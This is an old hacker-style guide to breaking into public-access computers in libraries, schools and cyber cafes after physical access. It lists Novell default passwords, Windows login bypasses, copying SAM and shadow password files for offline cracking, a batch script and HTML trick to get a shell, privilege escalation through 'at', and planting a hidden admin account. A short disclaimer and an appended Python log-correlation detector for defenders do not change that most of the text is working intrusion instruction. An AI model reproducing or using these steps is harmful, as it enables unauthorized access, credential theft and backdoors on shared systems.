A small guide about physical intrusion and its various aspects
+{_OPENING_}+
After some experimentation, I decided to write a guide to physical access. This will not cover how to get that access; that is an exercise left up to the reader. This guide covers the steps to take after physical access has been achieved: getting into the system, gaining a command prompt, and (maybe) getting an elevated privilege level. [DISCLAIMER] This paper was not posted with malicious intent. Instead it was posted to further knowledge of physical intrusion and how to conduct tests of it on your own networks. If you do choose to use this knowledge to gain unauthorized access to a network, you're on your own. Neither I, the author (n3w7yp3), nor the site that this is posted on will be responsible for your actions in any way, shape or form. If you fuck up, you're on your own! [/DISCLAIMER]
+{_PHASE 1_}+
The first phase of physical intrusion (as with any hacking) is a good amount of recon. The more you know about the system(s), the better chance you have of getting in. When you find a place that has public access terminals (local library, cyber cafe, your school, etc.), there are several observations that you should make. First, what OS do they run? Do they use that OS's standard login screen or something different (e.g. Novell)? What are the version numbers? Those are the things to notice about the software. As for physical things, do the computers have any disc drives? If so, are they CD, floppy, ZIP, DVD, a combination, or some other type? Be sure to check whether it has a floppy drive, as this can be used to easily perform some otherwise difficult steps later. Take a look at the staff who are supposed to keep an eye on the users. This could be a librarian, teacher, cyber cafe staff member, etc. Are they attentive? Do they walk around? Do they glance over users' shoulders? Also, try to become a regular at the target. Don't just come in twice (once to gather recon and the next to exploit); instead come a few days a week for about a month. That way the staff will get used to seeing you there. Take note of any other details that seem interesting. Try to learn as much as you can, but be sure to hide your knowledge. That could give you away. Now that you have gathered some knowledge about the target (and if you have not, stop reading and do that recon!), it is time to assemble the list of what we will bring along. Here is a list of items that I find useful:
1. a small mirror like the type found in a woman's cosmetic set (for seeing behind you and to the sides)
2. a floppy disk (this can contain several things; the most common is a Linux boot disk)
3. pen and paper (to write down useful info)
Well, that was a short list, but that is really all that you need. Now let's get to the next phase, Compromise.
+{_PHASE 2_}+
This is the compromise phase. In this phase you will go and gain access to the network. The stages that we will cover are:
1. Gain access to the system
2. Gain access to the network (if not already connected)
3. Gain a command prompt
4. Gain an elevated privilege level
Remember, when you go in there it *will* be tense. Speed is of the essence, but you have to try to look relaxed (if you don't, it will draw attention to you). Try to dress like the other people at this place so that you blend in (no, you can't wear your 2600 t-shirt...). Basic social engineering (SE) skills may come into play. Be ready. Make sure that you have an excuse as to why you are doing what you are doing. This will help to allay suspicion if you are caught. And be sure to rehearse this excuse so you can say it without tripping over your words.
Now when you first walk in, you will be presented with a choice of computers. Try to pick one away from most people, preferably with a screen that is hard to see if someone is shoulder surfing. From your recon you should know various details about the system, including how you log in to it. Most likely you have a username and password for the system. If not, there are several things you can try. The first is default passwords. Most systems contain a few of these. Here are some of the default passwords for Novell (courtesy of www.cirt.net; the source's Notes field is empty for every entry):
 #  Product                         Version  Method  User ID           Password          Level
 1  Groupwise 5.5 Enhancement Pack  N/A      Multi   servlet           manager           N/A
 2  Groupwise 6.0                   N/A      Multi   servlet           manager           N/A
 3  iManager                        2.0.1            admin             novell            Administrator
 4  NDS iMonitor                             HTTP    sadmin            (none)            Administrator
 5  Netware                         N/A      Multi   ADMIN             (none)            N/A
 6  Netware                         N/A      Multi   ADMIN             ADMIN             N/A
 7  Netware                         N/A      Multi   ARCHIVIST         (none)            N/A
 8  Netware                         N/A      Multi   ARCHIVIST         ARCHIVIST         N/A
 9  Netware                         N/A      Multi   BACKUP            (none)            N/A
10  Netware                         N/A      Multi   BACKUP            BACKUP            N/A
11  Netware                         N/A      Multi   CHEY_ARCHSVR      (none)            N/A
12  Netware                         N/A      Multi   CHEY_ARCHSVR      CHEY_ARCHSVR      N/A
13  Netware                         N/A      Multi   FAX               (none)            N/A
14  Netware                         N/A      Multi   FAX               FAX               N/A
15  Netware                         N/A      Multi   FAXUSER           (none)            N/A
16  Netware                         N/A      Multi   FAXUSER           FAXUSER           N/A
17  Netware                         N/A      Multi   FAXWORKS          (none)            N/A
18  Netware                         N/A      Multi   FAXWORKS          FAXWORKS          N/A
19  Netware                         N/A      Multi   GATEWAY           (none)            N/A
20  Netware                         N/A      Multi   GATEWAY           GATEWAY           N/A
21  Netware                         N/A      Multi   GUEST             (none)            N/A
22  Netware                         N/A      Multi   GUEST             GUEST             N/A
23  Netware                         N/A      Multi   GUEST             GUESTGUE          N/A
24  Netware                         N/A      Multi   GUEST             GUESTGUEST        N/A
25  Netware                         N/A      Multi   GUEST             TSEUG             N/A
26  Netware                         N/A      Multi   HPLASER           (none)            N/A
27  Netware                         N/A      Multi   HPLASER           HPLASER           N/A
28  Netware                         N/A      Multi   LASER             (none)            N/A
29  Netware                         N/A      Multi   LASER             LASER             N/A
30  Netware                         N/A      Multi   LASERWRITER       (none)            N/A
31  Netware                         N/A      Multi   LASERWRITER       LASERWRITER       N/A
32  Netware                         N/A      Multi   MAIL              (none)            N/A
33  Netware                         N/A      Multi   MAIL              MAIL              N/A
34  Netware                         N/A      Multi   POST              (none)            N/A
35  Netware                         N/A      Multi   POST              POST              N/A
36  Netware                         N/A      Multi   PRINT             (none)            N/A
37  Netware                         N/A      Multi   PRINT             PRINT             N/A
38  Netware                         N/A      Multi   PRINTER           (none)            N/A
39  Netware                         N/A      Multi   PRINTER           PRINTER           N/A
40  Netware                         N/A      Multi   ROOT              (none)            N/A
41  Netware                         N/A      Multi   ROOT              ROOT              N/A
42  Netware                         N/A      Multi   ROUTER            (none)            N/A
43  Netware                         N/A      Multi   SABRE             (none)            N/A
44  Netware                         N/A      Multi   SUPERVISOR        (none)            N/A
45  Netware                         N/A      Multi   SUPERVISOR        HARRIS            N/A
46  Netware                         N/A      Multi   SUPERVISOR        NETFRAME          N/A
47  Netware                         N/A      Multi   SUPERVISOR        NF                N/A
48  Netware                         N/A      Multi   SUPERVISOR        NFI               N/A
49  Netware                         N/A      Multi   SUPERVISOR        SUPERVISOR        N/A
50  Netware                         N/A      Multi   SUPERVISOR        SYSTEM            N/A
51  Netware                         N/A      Multi   TEST              (none)            N/A
52  Netware                         N/A      Multi   TEST              TEST              N/A
53  Netware                         N/A      Multi   USER_TEMPLATE     (none)            N/A
54  Netware                         N/A      Multi   USER_TEMPLATE     USER_TEMPLATE     N/A
55  Netware                         N/A      Multi   WANGTEK           (none)            N/A
56  Netware                         N/A      Multi   WANGTEK           WANGTEK           N/A
57  Netware                         N/A      Multi   WINDOWS_PASSTHRU  (none)            N/A
58  Netware                         N/A      Multi   WINDOWS_PASSTHRU  WINDOWS_PASSTHRU  N/A
59  Netware                         N/A      Multi   WINSABRE          SABRE             N/A
60  Netware                         N/A      Multi   WINSABRE          WINSABRE          N/A
Now, the system might not have Novell installed, or none of those may work. Well, if it is Windows 9x, simply power off the system (a hard power-off will be just fine), unplug the ethernet cable from the back and reboot. Then at the login screen click `Cancel'. Sometimes that will let you on. At this point create a new account and power off the system. Replace the ethernet cable and boot it back up. Then log in with the username/password that you have just entered (you might have to select the `Local workstation only' option). If the system is Windows XP, try selecting the `Local workstation only' option and entering the username `Administrator' with no password. I have found that that works at my school. If none of these work (or none are viable), power off the machine. Now reboot it and try to get the boot menu (press the F8 key during the boot process). If it comes up, select option 7 for the command line. Then enter the following commands (for Windows 9x):
C:\>cd windows
C:\WINDOWS> ren *.pwl *.txt
Then exit the command line and reboot. Now when the login screen comes up you can enter anything as the username and password (you might have to check the `Local workstation only' box). If that fails, try to boot into safe mode (press and hold F5 during startup). If this succeeds, it may give you Admin privileges. If it does, then the admin who oversees this network has "as much intelligence as 2 tin cans and a rubber band". At this point add a username, reboot and log in (again, don't forget the `Local workstation only' box). Alright, if all that has failed, insert your startup disk. You should have a Linux boot disk as well as one that matches the OS that we are trying to gain access to. Insert the one that matches the OS that we're hacking and reboot. Now at the command prompt try the following:
C:\>cd windows
C:\WINDOWS>win
Hopefully, that will boot us into Windows. However, chances are that it will not work. If that is the case, power off the box and insert the Linux boot disk. At this point our goal is to copy the password file to the disk and crack it at home. Here are some common locations of password files:
Windows
*SAM file:
C:\WINDOWS\system32\config\sam
C:\WINDOWS\system32\config\sam.txt
HKEY_LOCAL_MACHINE\SAM
C:\WINDOWS\system32repair\sam
UNIX (and its variants: Linux, FreeBSD, etc.)
*password file(s):
/etc/passwd
/etc/shadow
/.secure/etc/passwd
/etc/smbpasswd
/etc/nis/passwd
/etc/master.passwd
/etc/security/passwd
/etc/shadow-
/etc/shadow.lock (binary file)
VNC
*Windows:
HKEY_USERS\.DEFAULT\SOFTWARE\ORL\WinVNC3\Password
*UNIX:
$HOME/.vnc/passwd
If you can't find the password file, go on Google and run a search for the OS and its password file location. If you do get the password file, go home and crack it. Then come back and log in.
Okay, by this time we should have local access (one way or another). Also, set up the cosmetic mirror so that you can see behind you, and keep an eye on it. It is your early warning system in case someone comes up behind you. Now, your next goal is to get command prompt access. First let's try the easiest things:
In Windows:
1. Click Start, Run and type cmd (works for all but Win 9x)
2. Click Start, Programs, Accessories and then cmd (again, all but Win 9x)
3. Click Start, Programs and then MS-DOS Prompt (works for Win 9x)
In *nix:
1. Right-click on the desktop and select New Terminal
2. Click on the main menu, System Tools and then Terminal
Now if any of those work, then congrats, you have a shell. If not (which is more likely), we have a few more things to try.
In Windows:
1. Open up IE and type C:\ in the address bar. If it lets you in, navigate to the location of the command line and click on the icon. You're in.
2. Open Notepad and type in the following code (save it as 8.cmd if you're on Win2K/XP; save it as *.bat otherwise):
@ECHO OFF
CLS
START C:\COMMAND.COM
START C:\WINDOWS\COMMAND.COM
START C:\SYSTEM\COMMAND.COM
START C:\WINDOWS\SYSTEM\COMMAND.COM
START C:\WINNT\CMD.EXE
START C:\WINNT\COMMAND.COM
START C:\WINNT\SYSTEM32\CMD.EXE
START C:\WINNT\SYSTEM32\COMMAND.COM
START C:\WINDOWS\SYSTEM32\CMD.EXE
START C:\WINDOWS\SYSTEM32\COMMAND.COM
START c:\WINDOWS\CMD.EXE
START C:\CMD.EXE
CALL COMMAND.COM
CALL CMD.EXE
2a. Now run it. I have never failed to get command line access using this script.
3. If that fails, try the following: open up Notepad, type in the following HTML and save it as a *.html file:
<HTML>
<HEAD>
<TITLE>HD Access</TITLE>
</HEAD>
<BODY>
<P><A HREF="file:///C:">Click here for C: drive access</A></P>
</BODY>
</HTML>
3a. Now open that *.html and click the link. Everywhere that I have tried this, it has given me access.
4. Bring command.com on a floppy disk and execute it.
Anywhoo, you should have a command line one way or another. Now it is time to gather some info about the network. Here are some commands that can help us do this:
net view
net view /domain
net view /domain:domainname
ipconfig
ipconfig /all
ipconfig /displaydns
route print
arp -a
nbtstat -a [computer]
nbtstat -A [computer]
net use
netstat -an
nslookup (set the query type to any [all] and query the network's name server)
hostname
tracert [host]
Alright, from that little list we have gathered a good deal of info about the host/network. We know their hostname naming scheme (from the `hostname' command) and now we can guess other hostnames and use `nbtstat' to query them to find out info. We know domain names from `net view /domain' and the computers in those domains from `net view /domain:domainname'. We learned what hosts on the intranet we are connected to from the `netstat -an' command. `tracert', if pointed towards an outside host (e.g. www.google.com), will give us an idea of their network structure, and maybe give us the IP of the gateway and/or router along with other hosts. Well, now that we have some info, let's move on to the next phase: escalate.
+{_PHASE 3_}+
Now it is time for us to get an elevated privilege level. First let's try the `at' command; if it works then "YAY!!!". Make it spawn a shell in a minute (BTW: it will be the highest level, SYSTEM, which is even higher than Admin). If not (which is more likely), try to copy the password files to a disk (see the above section on boot disks), crack them and then log back in as an admin-level account. If all else fails, try to download and execute a local exploit on the system (yes, I know it's lame). Okay, hopefully we got an elevated privilege level by some means....
+{_PHASE 4_}+
Now it is time for the final phase, hiding our tracks. The first thing to do is to delete all the files that we made earlier. Then add an extra admin/SYSTEM/root/superuser account. Give it a good strong password. Then log off and walk away, knowing that you have access. BTW, don't forget the things you brought along!
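A defender-side view of phases 2 through 4, as an added example that is not part of n3w7yp3's guide: it correlates Windows Security-log events for a console logon as Administrator, a shell scheduled with `at', a new local account and its addition to Administrators on one terminal. The log lines and their key=value format are constructed for the example; the event IDs are the Windows 2000/XP and Vista-and-later IDs for those events.

```python
"""Correlate the post-access steps this guide walks through on a Windows
terminal: a console logon as the built-in Administrator, a shell scheduled
with `at' (runs as SYSTEM), a new local account, and that account being
added to Administrators.

The log lines below are CONSTRUCTED samples in a flat
"timestamp|host|event_id|subject|key=value ..." form, not an export from a
real system. Event IDs are the Security-log IDs for those events on
Windows 2000/XP (528, 602, 624, 636) and Vista and later (4624, 4698, 4720,
4732); both families are accepted.
"""
from collections import defaultdict
from datetime import datetime, timedelta

EVENT_KIND = {
    "528": "logon", "4624": "logon",
    "602": "task_created", "4698": "task_created",
    "624": "account_created", "4720": "account_created",
    "636": "local_group_add", "4732": "local_group_add",
}

# Constructed sample: LIB-PC07 shows the full sequence within five minutes;
# LIB-PC03 shows a normal user logon and, much later, an admin creating an
# account, which on its own should not alert.
SAMPLE_LOG = """\
2004-03-02 15:01:10|LIB-PC07|528|Administrator|LogonType=2
2004-03-02 15:04:32|LIB-PC07|602|Administrator|Task=at1.job Command=cmd.exe
2004-03-02 15:06:05|LIB-PC07|624|Administrator|NewAccount=helpdesk2
2004-03-02 15:06:20|LIB-PC07|636|Administrator|Group=Administrators Member=helpdesk2
2004-03-02 15:20:00|LIB-PC03|528|jdoe|LogonType=2
2004-03-02 16:40:00|LIB-PC03|624|sysadmin|NewAccount=intern
"""


def parse_line(line):
    """Split one flat log line into a dict; key=value pairs become fields."""
    ts, host, event_id, subject, detail = line.split("|", 4)
    fields = dict(kv.split("=", 1) for kv in detail.split())
    return {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "host": host,
            "kind": EVENT_KIND.get(event_id), "subject": subject, **fields}


def indicator(ev):
    """Return (kind, reason) if the event matches a step of the guide, else None."""
    kind = ev["kind"]
    if kind == "logon" and ev.get("LogonType") == "2" \
            and ev["subject"].lower() == "administrator":
        return kind, "console logon as built-in Administrator"
    if kind == "task_created" and any(
            s in ev.get("Command", "").lower() for s in ("cmd.exe", "command.com")):
        return kind, "scheduled task spawning a shell (at -> SYSTEM)"
    if kind == "account_created":
        return kind, "new local account " + ev.get("NewAccount", "?")
    if kind == "local_group_add" and ev.get("Group", "").lower() == "administrators":
        return kind, "added to local Administrators: " + ev.get("Member", "?")
    return None


def correlate(log_text, window_minutes=15):
    """Return {host: [reasons]} for each host where at least two different
    indicator kinds occur within window_minutes of each other."""
    window = timedelta(minutes=window_minutes)
    by_host = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        hit = indicator(ev)
        if hit:
            by_host[ev["host"]].append((ev["ts"], hit[0], hit[1]))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort()
        for i, (t0, _, _) in enumerate(hits):
            cluster = [(k, r) for t, k, r in hits[i:] if t - t0 <= window]
            if len({k for k, _ in cluster}) >= 2:
                alerts[host] = [r for _, r in cluster]
                break  # the earliest qualifying window per host is enough
    return alerts


if __name__ == "__main__":
    for host, reasons in correlate(SAMPLE_LOG).items():
        print(host)
        for r in reasons:
            print("  -", r)
```

With the default 15-minute window only LIB-PC07 alerts; shrinking the window to one minute still catches the account creation followed by the group change, which is the pair worth paging on.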
+{_CLOSING_}+
Well, I hope that somebody out there learns something from this. Remember, don't be a black-hat/cracker and use the knowledge that you acquire for damaging systems. Always follow the Hacker Ethic. Well, that's all from me.
peace,
--n3w7yp3
-=EOF=-
